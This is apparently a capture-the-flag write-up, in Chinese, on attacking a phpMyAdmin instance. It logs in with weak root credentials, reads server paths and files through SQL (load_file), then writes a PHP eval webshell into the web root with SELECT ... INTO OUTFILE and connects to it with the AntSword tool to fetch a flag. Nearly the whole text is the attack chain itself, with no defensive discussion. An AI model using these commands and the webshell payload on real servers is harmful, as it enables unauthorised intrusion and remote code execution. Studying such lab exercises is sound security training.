phpMyAdmin是Phpmyadmin团队的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。 在用户帐户页面中发现了一个SQL注入漏洞。创建对此页面的查询时,恶意用户可能会注入自定义SQL来代替其自己的用户名。攻击者必须具有有效的MySQL帐户才能访问服务器。 路径:/pma/index.php 密码root:123456
进入首页登录
输入
select @@datadir #查询数据库路径
输入
select @@basedir #查询MYSQL数据库的安装路径
输入
SELECT load_file('/var/www/html/pma/index.php')
大小为3kb
证明有东西,应该就是首页,那网站的路径即为/var/www/html/pma
插入一条木马
select '\';eval($_POST[999]); echo \'
\'; ?>' INTO OUTFILE '/var/www/html/pma/199.php'
使用蚁剑连接
http://10.9.47.6:26535/pma/199.php
获取flag